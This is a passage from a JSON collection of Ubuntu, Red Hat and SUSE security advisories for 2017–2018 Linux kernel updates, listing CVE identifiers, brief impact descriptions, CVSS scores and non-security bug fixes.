(system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). 
(CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not \nproperly restrict observations of netlink messages to the appropriate net \nnamespace. A local attacker could use this to expose sensitive information \n(kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not \nvalidate the number of configurations and interfaces in a device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. 
(CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) \nimplementation in the Linux kernel contained a branch-pruning logic issue \naround unreachable code. A local attacker could use this to cause a denial \nof service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux \nkernel incorrectly freed kernel memory. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper \ncomponent of the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) \nimplementation in the Linux kernel in certain circumstances. A local \nattacker could use this to cause a denial of service (system hang). \n(CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel \nwas vulnerable to a debug exception error when single-stepping through a \nsyscall. A local attacker in a non-Linux guest vm could possibly use this \nto gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page \nallocation. 
An attacker could use this to cause a denial of service (system \ncrash) or possibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in the loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS \n(Reliable Datagram Sockets) protocol implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in \nthe Linux kernel did not properly validate device resources. A local \nattacker could use this to cause a denial of service (system crash). 
\n(CVE-2018-8043)", "edition": 7, "modified": "2018-04-05T00:00:00", "published": "2018-04-05T00:00:00", "id": "USN-3619-2", "href": "https://ubuntu.com/security/notices/USN-3619-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:58", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16994", "CVE-2017-17712", "CVE-2017-5754"], "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, Important)(ppc only)\n\n* kernel: Race condition in raw_sendmsg function allows denial-of-service or kernel addresses leak (CVE-2017-17712, Important)\n\n* kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak (CVE-2017-16994, Moderate)\n\nBug Fix(es):\n\n* When changing the Maximum Transmission Unit (MTU) size on Broadcom BCM5717, BCM5718 and BCM5719 chipsets, the tg3 driver sometimes lost synchronization with the device. Consequently, the device became unresponsive. With this update, tg3 has been fixed, and devices no longer hang due to this behavior. (BZ#1533478)\n\n* Previously, the perf tool used strict string matching to provide related events to a particular CPUID instruction. Consequently, the events were not available on certain IBM PowerPC systems. This update fixes perf to use regular expressions instead of string matching of the entire CPUID string. As a result, the perf tool now supports events on IBM PowerPC architectures as expected. (BZ#1536567)\n\n* Previously, the kernel debugfs file system implemented removal protection based on sleepable read-copy-update (SRCU), which slowed down the drivers relying on the debugfs_remove_recursive() function. Consequently, a decrease in performance or a deadlock sometimes occurred. 
This update implements per-file removal protection in debugfs. As a result, the performance of the system has improved significantly. (BZ#1538030)\n\n* When running the 'perf test' command on a PowerKVM guest multiple times, the branch instructions recorded in Branch History Rolling Buffer (BHRB) entries were sometimes unmapped before the kernel processed the entries. Consequently, the operating system terminated unexpectedly. This update fixes the bug, and the operating system no longer crashes in the described situation. (BZ#1538031)", "modified": "2018-03-19T16:23:49", "published": "2018-03-13T19:15:20", "id": "RHSA-2018:0502", "href": "https://access.redhat.com/errata/RHSA-2018:0502", "type": "redhat", "title": "(RHSA-2018:0502) Important: kernel-alt security and bug fix update", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-12-08T21:45:39", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702 1069708).\n - CVE-2017-1000405: The Linux Kernel had a problematic use of\n pmd_mkdirty() in the touch_pmd() function inside the THP implementation.\n touch_pmd() could be reached by get_user_pages(). In such case, the pmd\n would become dirty. 
This scenario breaks the new\n can_follow_write_pmd()'s logic - pmd could become dirty without going\n through a COW cycle. This bug was not as severe as the original "Dirty\n cow" because an ext4 file (or any other regular file) could not be\n mapped using THP. Nevertheless, it did allow us to overwrite read-only\n huge pages. For example, the zero huge page and sealed shmem files could\n be overwritten (since their mapping could be populated using THP). Note\n that after the first write page-fault to the zero page, it will be\n replaced with a new fresh (and zeroed) thp (bnc#1069496 1070307).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1067085).\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel, when CONFIG_X86_X32 is enabled, allowed local users to\n gain privileges via a recvmmsg system call with a crafted timeout\n pointer parameter (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1067086).\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1066700).\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL 
pointer dereference (bnc#1066705).\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor\n (bnc#1066671).\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations\n (bnc#1066192).\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066650).\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup (bnc#1066618).\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066573).\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device (bnc#1066606).\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service 
(snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066625).\n\n The following non-security bugs were fixed:\n\n - Define sock_efree (bsc#1067997).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid "device_busy" error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not 
freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - powerpc/powernv: Remove OPAL v1 takeover (bsc#1070781).\n - powerpc/vdso64: Use double word compare on pointers\n - powerpc: Convert cmp to cmpd in idle enter sequence\n\n", "edition": 1, "modified": "2017-12-08T18:11:43", "published": "2017-12-08T18:11:43", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00023.html", "id": "SUSE-SU-2017:3249-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T19:02:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", 
"CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages. (bnc#1069702)\n - CVE-2017-1000405: mm, thp: do not dirty huge pages on read fault\n (bnc#1069496).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1067085)\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c, when\n CONFIG_X86_X32 is enabled, allowed local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer parameter\n (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device. 
(bnc#1067086)\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1066700)\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference. (bnc#1066705)\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.\n (bnc#1066671)\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations.\n (bnc#1066192)\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066650)\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup. 
(bnc#1066618)\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066573)\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device. (bnc#1066606)\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service (snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066625)\n\n The following non-security bugs were fixed:\n\n - NVMe: No lock while DMA mapping data (bsc#975788).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor 
btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid "device_busy" error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - packet: fix use-after-free in fanout_add()\n - scsi: ILLEGAL 
REQUEST + ASC==27 produces target failure (bsc#1059465).\n\n", "edition": 1, "modified": "2017-12-04T15:07:06", "published": "2017-12-04T15:07:06", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00005.html", "id": "SUSE-SU-2017:3210-1", "title": "Security update for the Linux Kernel (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-23T20:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16913", "CVE-2018-8087", "CVE-2017-16912", "CVE-2017-17975", "CVE-2017-13166", "CVE-2017-15951", "CVE-2017-18208", "CVE-2018-1068", "CVE-2017-16644", "CVE-2018-1000026"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.120 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-13166: An elevation of privilege vulnerability in the v4l2\n video driver was fixed. (bnc#1072865).\n - CVE-2017-15951: The KEYS subsystem did not correctly synchronize the\n actions of updating versus finding a key in the "negative" state to\n avoid a race condition, which allowed local users to cause a denial of\n service or possibly have unspecified other impact via crafted system\n calls (bnc#1062840 bnc#1065615).\n - CVE-2017-16644: The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c allowed local users to cause a\n denial of service (improper error handling and system crash) or possibly\n have unspecified other impact via a crafted USB device (bnc#1067118).\n - CVE-2017-16912: The "get_pipe()" function (drivers/usb/usbip/stub_rx.c)\n allowed attackers to cause a denial of service (out-of-bounds read) via\n a specially crafted USB over IP packet (bnc#1078673).\n - CVE-2017-16913: The "stub_recv_cmd_submit()" function\n (drivers/usb/usbip/stub_rx.c) when handling CMD_SUBMIT packets allowed\n attackers to cause a denial of service (arbitrary memory allocation) via\n a specially crafted USB 
over IP packet (bnc#1078672).\n - CVE-2017-17975: Use-after-free in the usbtv_probe function in\n drivers/media/usb/usbtv/usbtv-core.c allowed attackers to cause a denial\n of service (system crash) or possibly have unspecified other impact by\n triggering failure of audio registration, because a kfree of the usbtv\n data structure occurs during a usbtv_video_free call, but the\n usbtv_video_fail label's code attempts to both access and free this data\n structure (bnc#1074426).\n - CVE-2017-18208: The madvise_willneed function in mm/madvise.c allowed\n local users to cause a denial of service (infinite loop) by triggering\n use of MADVISE_WILLNEED for a DAX mapping (bnc#1083494).\n - CVE-2018-8087: Memory leak in the hwsim_new_radio_nl function in\n drivers/net/wireless/mac80211_hwsim.c allowed local users to cause a\n denial of service (memory consumption) by triggering an out-of-array\n error case (bnc#1085053).\n - CVE-2018-1000026: An insufficient input validation vulnerability in the\n bnx2x network card driver could result in DoS: Network card firmware\n assertion takes card off-line. This attack appears to be exploitable by\n an attacker who passes a very large, specially crafted packet to the\n bnx2x card. This can be done from an untrusted guest VM. (bnc#1079384).\n - CVE-2018-1068: Insufficient user provided offset checking in the\n ebtables compat code allowed local attackers to overwrite kernel memory\n and potentially execute code. 
(bsc#1085107)\n\n The following non-security bugs were fixed:\n\n - acpi / bus: Leave modalias empty for devices which are not present\n (bnc#1012382).\n - acpi: sbshc: remove raw pointer from printk() message (bnc#1012382).\n - Add delay-init quirk for Corsair K70 RGB keyboards (bnc#1012382).\n - add ip6_make_flowinfo helper (bsc#1042286).\n - ahci: Add Intel Cannon Lake PCH-H PCI ID (bnc#1012382).\n - ahci: Add PCI ids for Intel Bay Trail, Cherry Trail and Apollo Lake AHCI\n (bnc#1012382).\n - ahci: Annotate PCI ids for mobile Intel chipsets as such (bnc#1012382).\n - alpha: fix crash if pthread_create races with signal delivery\n (bnc#1012382).\n - alpha: fix reboot on Avanti platform (bnc#1012382).\n - alsa: hda/ca0132 - fix possible NULL pointer use (bnc#1012382).\n - alsa: hda - Fix headset mic detection problem for two Dell machines\n (bnc#1012382).\n - alsa: hda/realtek - Add headset mode support for Dell laptop\n (bsc#1031717).\n - alsa: hda/realtek: PCI quirk for Fujitsu U7x7 (bnc#1012382).\n - alsa: hda - Reduce the suspend time consumption for ALC256 (bsc#1031717).\n - alsa: hda - Use IS_REACHABLE() for dependency on input (bsc#1031717).\n - alsa: seq: Fix racy pool initializations (bnc#1012382).\n - alsa: seq: Fix regression by incorrect ioctl_mutex usages (bnc#1012382).\n - alsa: usb-audio: add implicit fb quirk for Behringer UFX1204\n (bnc#1012382).\n - alsa: usb-audio: Fix UAC2 get_ctl request with a RANGE attribute\n (bnc#1012382).\n - amd-xgbe: Fix unused suspend handlers build warning (bnc#1012382).\n - arm64: define BUG() instruction without CONFIG_BUG (bnc#1012382).\n - arm64: Disable unhandled signal log messages by default (bnc#1012382).\n - arm64: dts: add #cooling-cells to CPU nodes (bnc#1012382).\n - arm64: Kconfig: select COMPAT_BINFMT_ELF only when BINFMT_ELF is set\n (bnc#1012382).\n - arm: 8731/1: Fix csum_partial_copy_from_user() stack mismatch\n (bnc#1012382).\n - arm: AM33xx: PRM: Remove am33xx_pwrdm_read_prev_pwrst function\n 
(bnc#1012382).\n - arm: dts: am4372: Correct the interrupts_properties of McASP\n (bnc#1012382).\n - arm: dts: Fix omap4 hang with GPS connected to USB by using wakeupgen\n (bnc#1012382).\n - arm: dts: ls1021a: fix incorrect clock references (bnc#1012382).\n - arm: dts: s5pv210: add interrupt-parent for ohci (bnc#1012382).\n - arm: dts: STi: Add gpio polarity for "hdmi,hpd-gpio" property\n (bnc#1012382).\n - arm: kvm: Fix SMCCC handling of unimplemented SMC/HVC calls\n (bnc#1012382).\n - arm: OMAP2+: Fix SRAM virt to phys translation for\n save_secure_ram_context (bnc#1012382).\n - arm: omap2: hide omap3_save_secure_ram on non-OMAP3 builds (git-fixes).\n - arm: pxa/tosa-bt: add MODULE_LICENSE tag (bnc#1012382).\n - arm: spear13xx: Fix dmas cells (bnc#1012382).\n - arm: spear13xx: Fix spics gpio controller's warning (bnc#1012382).\n - arm: spear600: Add missing interrupt-parent of rtc (bnc#1012382).\n - arm: tegra: select USB_ULPI from EHCI rather than platform (bnc#1012382).\n - asoc: au1x: Fix timeout tests in au1xac97c_ac97_read() (bsc#1031717).\n - asoc: Intel: Kconfig: fix build when acpi is not enabled (bnc#1012382).\n - asoc: Intel: sst: Fix the return value of 'sst_send_byte_stream_mrfld()'\n (bsc#1031717).\n - asoc: mediatek: add i2c dependency (bnc#1012382).\n - asoc: nuc900: Fix a loop timeout test (bsc#1031717).\n - asoc: pcm512x: add missing MODULE_DESCRIPTION/AUTHOR/LICENSE\n (bnc#1012382).\n - asoc: rockchip: disable clock on error (bnc#1012382).\n - asoc: rockchip: use __maybe_unused to hide st_irq_syscfg_resume\n (bnc#1012382).\n - asoc: rsnd: avoid duplicate free_irq() (bnc#1012382).\n - asoc: rsnd: do not call free_irq() on Parent SSI (bnc#1012382).\n - asoc: simple-card: Fix misleading error message (bnc#1012382).\n - asoc: ux500: add MODULE_LICENSE tag (bnc#1012382).\n - ata: ahci_xgene: free structure returned by acpi_get_object_info()\n (bsc#1082979).\n - b2c2: flexcop: avoid unused function warnings (bnc#1012382).\n - binder: add missing 
binder_unlock() (bnc#1012382).\n - binder: check for binder_thread allocation failure in binder_poll()\n (bnc#1012382).\n - binfmt_elf: compat: avoid unused function warning (bnc#1012382).\n - blacklist.conf: commit fd5f7cde1b85d4c8e09 ("printk: Never set\n console_may_schedule in console_trylock()")\n - blktrace: fix unlocked registration of tracepoints (bnc#1012382).\n - bluetooth: btsdio: Do not bind to non-removable BCM43341 (bnc#1012382).\n - bluetooth: btusb: Restore QCA Rome suspend/resume fix with a "rewritten"\n version (bnc#1012382).\n - bnx2x: Improve reliability in case of nested PCI errors (bnc#1012382).\n - bnxt_en: Fix the 'Invalid VF' id check in bnxt_vf_ndo_prep routine\n (bnc#1012382).\n - bpf: arsh is not supported in 32 bit alu thus reject it (bnc#1012382).\n - bpf: avoid false sharing of map refcount with max_entries (bnc#1012382).\n - bpf: fix 32-bit divide by zero (bnc#1012382).\n - bpf: fix bpf_tail_call() x64 JIT (bnc#1012382).\n - bpf: fix divides by zero (bnc#1012382).\n - bpf: introduce BPF_JIT_ALWAYS_ON config (bnc#1012382).\n - bpf: reject stores into ctx via st and xadd (bnc#1012382).\n - bridge: implement missing ndo_uninit() (bsc#1042286).\n - bridge: move bridge multicast cleanup to ndo_uninit (bsc#1042286).\n - btrfs: copy fsid to super_block s_uuid (bsc#1080774).\n - btrfs: fix crash due to not cleaning up tree log block's dirty bits\n (bnc#1012382).\n - btrfs: fix deadlock in run_delalloc_nocow (bnc#1012382).\n - btrfs: fix deadlock when writing out space cache (bnc#1012382).\n - btrfs: fix kernel oops while reading compressed data (bsc#1081671).\n - btrfs: Fix possible off-by-one in btrfs_search_path_in_tree\n (bnc#1012382).\n - btrfs: Fix quota reservation leak on preallocated files (bsc#1079989).\n - btrfs: fix unexpected -EEXIST when creating new inode (bnc#1012382).\n - btrfs: Handle btrfs_set_extent_delalloc failure in fixup worker\n 